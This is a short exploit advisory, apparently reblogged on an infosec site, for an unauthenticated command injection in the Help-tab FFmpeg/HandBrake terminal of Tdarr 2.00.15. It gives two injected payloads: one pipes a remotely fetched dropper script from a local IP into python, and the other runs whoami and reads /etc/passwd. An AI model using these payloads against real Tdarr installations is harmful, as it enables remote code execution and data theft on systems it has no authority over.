Tdarr 2.00.15 – Command Injection

11 March 2022

# Exploit Title: Tdarr 2.00.15 - Command Injection

# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

Bookmark

Please login to bookmark

Share the word, let's increase Cybersecurity Awareness as we know it

- Sponsored -

Discover more infosec

Steven Black (n0tst3)

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

explore

more

security

Tdarr 2.00.15 – Command Injection

Sponsored Offer

Discover more infosec

more infosec reads

Subscribe for weekly updates

explore

Editor Picks

Featured

Cyber Academy

ABOUT US

Social

Subscribe for weekly updates

Add RiSec to your Homescreen?